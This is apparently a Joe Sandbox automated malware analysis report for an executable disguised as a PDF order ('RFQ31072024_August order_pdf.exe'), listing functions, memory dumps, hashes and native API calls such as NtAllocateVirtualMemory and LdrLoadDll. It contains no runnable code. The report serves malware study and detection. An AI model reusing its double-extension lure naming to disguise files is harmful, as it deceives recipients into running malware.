Opcode ID: 264819c0af0b40c388c3a8306086207c1126b2840a2074407e526764805ff470
Instruction ID: 7a351cd04f3fe15e58ac4ec026405c6399acbc396b59602247d57b7bd2720949
Opcode Fuzzy Hash: 264819c0af0b40c388c3a8306086207c1126b2840a2074407e526764805ff470
Instruction Fuzzy Hash: 8E1113B5D003498FDB20CF9AC444BDEFBF9BB88224F10841AD428B7244D379A545CFA5

Function 0236B2E2 Relevance: 1.5, APIs: 1, Instructions: 44libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0236B099,00000800,00000000,00000000), ref: 0236B2AA

Memory Dump Source

Source File: 00000000.00000002.1425509119.0000000002360000.00000040.00000800.00020000.00000000.sdmp, Offset: 02360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2360000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 50156022c966ec661e4558c03310d3793e4b0872e4a218bf037e841581cf775f
Instruction ID: 86a6e0b5c939ec3de0d588f36e37dabfa199a63810492810290da8f674e764dd
Opcode Fuzzy Hash: 50156022c966ec661e4558c03310d3793e4b0872e4a218bf037e841581cf775f
Instruction Fuzzy Hash: 9901F7719043498FDB119BA9D8083EEFFF99F86328F08808BD188E7141C3759495CF95

Function 007AD3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1422868796.00000000007AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ad000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 270f405993aaf040a9f3e3d4872a008cd194fd674b474d7e38425d17bd25c8c9
Instruction ID: 812aac91fa97160c37b43b183dee5fe35038ef08c84504956ce97dd1faa286f2
Opcode Fuzzy Hash: 270f405993aaf040a9f3e3d4872a008cd194fd674b474d7e38425d17bd25c8c9
Instruction Fuzzy Hash: FC21F4B5504344DFDB14DF10D9C4B16BB65FBD9324F20C269EC0A0B656C33AEC56CAA2

Function 007AD4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1422868796.00000000007AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ad000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b58ef01e5179a4f201f7d8232f1e3ce2d43fc163694f7f45139d66f90eff66f
Instruction ID: c6bc1f8caccc4a6da2093a0e9988f8171d8a366685607f3ce84862474e005a51
Opcode Fuzzy Hash: 4b58ef01e5179a4f201f7d8232f1e3ce2d43fc163694f7f45139d66f90eff66f
Instruction Fuzzy Hash: BC213871904240DFDB10DF10D8C4B16BF61FBC8318F20C669E8060B656C33ADC16CBA2

Function 007CD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1422985596.00000000007CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7cd000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 246773777373fa4635388d52665e75119ed5bf840ab5dde52dd8865eb5c57cd1
Instruction ID: 66d45ee227d807a6e4350c363b85001d97cf9c083304b9f505e0acea6c8e7061
Opcode Fuzzy Hash: 246773777373fa4635388d52665e75119ed5bf840ab5dde52dd8865eb5c57cd1
Instruction Fuzzy Hash: 0121CF756043049FDB24DF18D984F16BBA5FB88324F20C56DD84A4B286C37ADC87CA62

Function 007CD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1422985596.00000000007CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7cd000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 647b9996cc945de1407c98ee1e107f351223a9e88219e5fa9b33545ce7fe427e
Instruction ID: 01dab01f8082660f136e2608488fbfc90446b380fab4351efae366c6b57b12dc
Opcode Fuzzy Hash: 647b9996cc945de1407c98ee1e107f351223a9e88219e5fa9b33545ce7fe427e
Instruction Fuzzy Hash: BA21D0B5604304AFDB25DF10D984F26BBA5FB88324F24C67DE8494B292C33ADC46CB61

Function 007AD4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1422868796.00000000007AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ad000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
Instruction ID: 52266ee95386a9206dacc49f8856db39d82f178a1a18d2121d93de2dc2f571d2
Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
Instruction Fuzzy Hash: 0C11E676904280CFCB15CF14D5C4B16BF72FBD4324F24C6A9D84A0B656C33AD966CBA2

Function 007AD3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1422868796.00000000007AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ad000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
Instruction ID: 85173a1d87e61e0117a2503cef976af69f371893f3e9c2be11de1150fae36b87
Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
Instruction Fuzzy Hash: 4E110376504280CFCB11CF00D5C4B16BF72FB98324F24C2A9DC0A0B656C33AE856CBA1

Function 007CD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1422985596.00000000007CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7cd000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
Instruction ID: e794df62bb8ad1129d3675fdf71a2a27a0a2ade6a4594c6d73bc054564437540
Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
Instruction Fuzzy Hash: 55119D76504284DFCB15DF14D9C4B15FBB2FB84324F24C6AED8494B696C33AD84ACB61

Function 007CD017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1422985596.00000000007CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7cd000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
Instruction ID: 11319bea96fcf5151f04e61fd893a2e5f12cf633ee3eb6e1e78191004d567be9
Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
Instruction Fuzzy Hash: 2C119075504284DFCB15CF14D5D4B15FB62FB84314F24C6ADD8494B656C33AD84ACB62

Non-executed Functions

Function 06A1C8B0 Relevance: .4, Instructions: 359COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1432146687.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a10000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 456ae7ff10e832bba8751f8acdcce2c074d7639b3975df7c8a58142b1fc691df
Instruction ID: a076f704aad4660c14783906cbaa4c27f065c8848b19bf0fa0eb77d6ed6d1936
Opcode Fuzzy Hash: 456ae7ff10e832bba8751f8acdcce2c074d7639b3975df7c8a58142b1fc691df
Instruction Fuzzy Hash: 32D1BA70B406048FEB66EB75C860B6AB7FBAF89710F14846AD156DF394DB38E801CB51

Function 06A144C0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1432146687.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a10000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0f83f6bf1f5d7314870846f844ddfcf0db20abf3009e5962fc22d66533ba698
Instruction ID: 20e75a96c5bcba3361a7c8efaa778651abf0016a0b09a8fd3c288525cc5ce924
Opcode Fuzzy Hash: c0f83f6bf1f5d7314870846f844ddfcf0db20abf3009e5962fc22d66533ba698
Instruction Fuzzy Hash: 0BE1F774E002198FDB14DFA9C580AAEFBF2FF89315F248169D418AB355D734A942CFA0

Function 06A16D88 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1432146687.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a10000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0776411fd4348291ec08f2a28df202874c107a2de839ef6ef72c79b56fd45899
Instruction ID: ca403dfa24d8847955b4a4c1b5e7dfdec085aa841f277cb20a6af449289aee20
Opcode Fuzzy Hash: 0776411fd4348291ec08f2a28df202874c107a2de839ef6ef72c79b56fd45899
Instruction Fuzzy Hash: 2DE1F974E002198FDB14DFA9C580AAEFBF2FF89345F248169E414AB355D771A942CFA0

Function 06A14D30 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1432146687.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a10000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b0e0aba1c6948559d5b67d2329d0c4acd53b6e4f30ee2d6520905a638616938
Instruction ID: 0bda813e2c90f96dcebbed7b2a8e85655e85ae3dc7a404011472afe53cb413fb
Opcode Fuzzy Hash: 4b0e0aba1c6948559d5b67d2329d0c4acd53b6e4f30ee2d6520905a638616938
Instruction Fuzzy Hash: 2CE1F974E002198FDB54DFA9C580AAEFBF2FF89315F248169D418AB355D731A942CFA0

Function 06A163D8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1432146687.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a10000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76ef3434ca4d73df4ec9c651bd714f5e1ae6880f5b682c5ad90b4d9a5677c5cf
Instruction ID: 54c1ca35927680541a22f0c2a11c4ce867a16ab360c7b3ddb46bd4c822022575
Opcode Fuzzy Hash: 76ef3434ca4d73df4ec9c651bd714f5e1ae6880f5b682c5ad90b4d9a5677c5cf
Instruction Fuzzy Hash: F9E1F874E002198FDB14DFA9C580AAEFBF2FF89355F248169D414AB356D731A942CFA0

Function 06A148F8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1432146687.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a10000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 781f219c6cd2db5277b6f72424e23411824ce0a12e059417218ab297b641759e
Instruction ID: e38e69d5056022f81ff5031d9b4389cbef142907aecc2ee248e6ffcb1f8eac03
Opcode Fuzzy Hash: 781f219c6cd2db5277b6f72424e23411824ce0a12e059417218ab297b641759e
Instruction Fuzzy Hash: 1CE10B74E002198FDB14DFA9C580AAEFBF2FF89315F248169D414AB355D735A942CFA0

Function 0236D384 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1425509119.0000000002360000.00000040.00000800.00020000.00000000.sdmp, Offset: 02360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2360000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69d66052afa5322077e857f8f3c4a097e63bfb2ae1ba0880d200daef46550227
Instruction ID: e805d05f7fff84d895bf96a483821b86e06f29354ca207a9b71a3a297d2da2a3
Opcode Fuzzy Hash: 69d66052afa5322077e857f8f3c4a097e63bfb2ae1ba0880d200daef46550227
Instruction Fuzzy Hash: 5FA19036E00209CFCF15DFB4D9485AEB7BAFF85304B14856AE806AB269DB71E915CF40

Function 06A163C8 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1432146687.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a10000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da9687d523fe1b8aafb60eef8e2886ad41aa2a12061a7891c1cca31ed510451e
Instruction ID: 5e1b1388e9dfb1e2ff8f7bf331941b783e15c1a081c17126038aff7195950d89
Opcode Fuzzy Hash: da9687d523fe1b8aafb60eef8e2886ad41aa2a12061a7891c1cca31ed510451e
Instruction Fuzzy Hash: B1512BB4E002198FDB14DFA9C5809AEFBF2FF89314F248169D418AB356D7309952CFA1

Function 06A1A628 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1432146687.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a10000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af6a9af439e42c1202016cfa37b808be423d886dc97b88e503b650737c8ef268
Instruction ID: c1430845f26cfcbea99deed6c7f6d5d888ea0d2b98b0617074eb7bdaf75555cc
Opcode Fuzzy Hash: af6a9af439e42c1202016cfa37b808be423d886dc97b88e503b650737c8ef268
Instruction Fuzzy Hash: B641A9B1D066288BEB68DF5B8D047DAF6B7BFC9300F04C1AAC51DAA254E7740A85CF50

Function 06A10040 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1432146687.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a10000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d26a0a8c92b138ce2cabb7bdca06f392a9d0c8723995a7102d08b25e293087db
Instruction ID: 009d5e74ef4eb1eb7f7d66d7d853e3f01e7cb8d7c7d0d440f96044092e56c62c
Opcode Fuzzy Hash: d26a0a8c92b138ce2cabb7bdca06f392a9d0c8723995a7102d08b25e293087db
Instruction Fuzzy Hash: 8941B4B4D05618CFEB58DF6AC944B9AFAF6BF88301F05C1A5D40CAB215DB309985CFA1

Function 06A10006 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1432146687.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a10000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fef468170daa2229a51efe25e81579560d5dc9bf5d05f4ba015d6cc0276bcfa
Instruction ID: 0844606d9755cb6a1ec85330fb10b49effbfc8cb072839588ad81a352a057a11
Opcode Fuzzy Hash: 8fef468170daa2229a51efe25e81579560d5dc9bf5d05f4ba015d6cc0276bcfa
Instruction Fuzzy Hash: F321E071D097849FD719DF6B885069ABFF3AFC6200F09C0A6D444EB166DA341946CF52

Analysis Process: RFQ31072024_August order_pdf.exePID: 7856, Parent PID: 7488COMMON

Execution Graph

Execution Coverage:	1.5%
Dynamic/Decrypted Code Coverage:	2.7%
Signature Coverage:	5.8%
Total number of Nodes:	549
Total number of Limit Nodes:	68

Executed Functions

Function 0041A3FA Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445

Strings

bMA, xrefs: 0041A422, 0041A430
bMA, xrefs: 0041A43D, 0041A444
!JA, xrefs: 0041A41C, 0041A428

Memory Dump Source

Source File: 00000007.00000002.1488235517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RFQ31072024_August order_pdf.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: !JA$bMA$bMA
API String ID: 2738559852-4222312340
Opcode ID: ed4fc85fa62db3a85841ce0d6022ff24d4ab5f8245835b4def32d1add7225e03
Instruction ID: ec16e3f80ac921bdc625da619f57a6a3ed91b4464f392fee3f785272072359bd
Opcode Fuzzy Hash: ed4fc85fa62db3a85841ce0d6022ff24d4ab5f8245835b4def32d1add7225e03
Instruction Fuzzy Hash: E3F0F9B6200108AFCB14DF99CC81EEB77A9EF8C354F118248BA1DA7241D631E815CBA0

Function 0041A400 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445

Strings

bMA, xrefs: 0041A422, 0041A430
bMA, xrefs: 0041A43D, 0041A444
!JA, xrefs: 0041A41C, 0041A428

Memory Dump Source

Source File: 00000007.00000002.1488235517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RFQ31072024_August order_pdf.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: !JA$bMA$bMA
API String ID: 2738559852-4222312340
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 27817754ac388b25b847a3362b671b2e44b934df7eae6808a762aa4d31f9cf83
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 93F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4

Function 0040ACE0 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52

Memory Dump Source

Source File: 00000007.00000002.1488235517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RFQ31072024_August order_pdf.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction ID: d499f532a4605d4acc668fd39ab8700ce4e6b27de0f8ef54b1fb0fb48fae0bb4
Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction Fuzzy Hash: EF0152B5D4020DA7DB10EBA5DC42FDEB3789F14308F0041A5E908A7281F634EB54CB95

Function 0041A34A Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D

Memory Dump Source

Source File: 00000007.00000002.1488235517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RFQ31072024_August order_pdf.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 6a5adb4ef3284987964d4dab0ce7a7c06cb73f67ecf3ec0a4d946d308cad6e3a
Instruction ID: c67dec8f47f346461a73008f6ec05839ac7088d08551e3c8103d0e406de79d77
Opcode Fuzzy Hash: 6a5adb4ef3284987964d4dab0ce7a7c06cb73f67ecf3ec0a4d946d308cad6e3a
Instruction Fuzzy Hash: 52F019B2214049ABCB48DF98D884CEB7BA9AF8C314B14864CFA5C93201D630E851CBA0

Function 0041A350 Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D

Memory Dump Source

Source File: 00000007.00000002.1488235517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RFQ31072024_August order_pdf.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 880687b14e2bfdcefdfb108c829fe1d34a34742feba638e3287dae326a4d6923
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: AAF0BDB2201208AFCB08CF89DC85EEB77ADAF8C754F158248BA1D97241C630E8518BA4

Function 0041A52A Relevance: 1.5, APIs: 1, Instructions: 33
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B124,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A569

Memory Dump Source

Source File: 00000007.00000002.1488235517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RFQ31072024_August order_pdf.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: cedbc09b6540ac2b585e326ce1c9247ae16818ae100b0429d70632890d610553
Instruction ID: 16f819385167e9bc52c6ae36caba999270085ffc61474b7c2b922b547a4565d6
Opcode Fuzzy Hash: cedbc09b6540ac2b585e326ce1c9247ae16818ae100b0429d70632890d610553
Instruction Fuzzy Hash: 54F0F8B2210218AFDB14DF99CC81EEB77ADAF8C754F158649FA1897241C630F911CBB4

Function 0041A530 Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B124,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A569

Memory Dump Source

Source File: 00000007.00000002.1488235517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RFQ31072024_August order_pdf.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 4e0f78fd3c2c10b6dba7ecb12144fed22081eaa1fb7babd41561f41a61d0d9a2
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: A3F015B2200208AFCB14DF89CC81EEB77ADAF88754F118149BE1C97241C630F811CBA4

Function 0041A47B Relevance: 1.5, APIs: 1, Instructions: 23nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5

Memory Dump Source

Source File: 00000007.00000002.1488235517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RFQ31072024_August order_pdf.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: b851e06b77cea5554b203601b2958d7f3e20a20cc52cf5d293111947ebb14c50
Instruction ID: 7c8e9a6c11b1bd0eda43162227e838de7a0ee0a296224068069ac814b73f0da3
Opcode Fuzzy Hash: b851e06b77cea5554b203601b2958d7f3e20a20cc52cf5d293111947ebb14c50
Instruction Fuzzy Hash: CAE08C76200310AFD710EB98CC46EE73BA8EF88720F01409ABA1C5B252C130EA4086E0

Function 0041A480 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5

Memory Dump Source

Source File: 00000007.00000002.1488235517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RFQ31072024_August order_pdf.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 58703de6d0d09b45194c1a78dafb6a6614d70e6a8447524affba2eb7b0ba4c9c
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: E9D01776200214ABD710EB99CC85EE77BACEF48764F154499BA1C9B242C530FA1086E4

Function 01612B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01612B6A

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34380866b42ece6ac60211f2d7ed126c69b7bbf17a28dc7f658f7bd6c7942f4a
Instruction ID: cbb91de27eb12c448937f5356a817a8e9e5ee2194a90650f999b277ed5e9784d
Opcode Fuzzy Hash: 34380866b42ece6ac60211f2d7ed126c69b7bbf17a28dc7f658f7bd6c7942f4a
Instruction Fuzzy Hash: C090026120281003410575584C15617404E97E0201B55C021E5014694EC92589916625

Function 01612BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01612BFA

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 630df219df73851381529783e37c03d6a4eb44f366f06aba509f2787b61f1dc8
Instruction ID: 8568c1121d67faf47896bf60325657d98b78aa78ee643513d2d1ec664fbbb709
Opcode Fuzzy Hash: 630df219df73851381529783e37c03d6a4eb44f366f06aba509f2787b61f1dc8
Instruction Fuzzy Hash: 9290023120181802D18075584C0564B004997D1301F95C015E4025758ECE158B597BA1

Function 01612AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01612ADA

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 82804b25de4a6750f842cb0fa265974d8bbb30ea8779c96341a657b6ca5b7f31
Instruction ID: da470a4a43a7eb88612ea0928f6ec341ff8bd35606e6c03f3345fd6fbb17fec6
Opcode Fuzzy Hash: 82804b25de4a6750f842cb0fa265974d8bbb30ea8779c96341a657b6ca5b7f31
Instruction Fuzzy Hash: 34900225211810030105B9580F05507008A97D5351355C021F5015654DDA2189615621

Function 01612D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

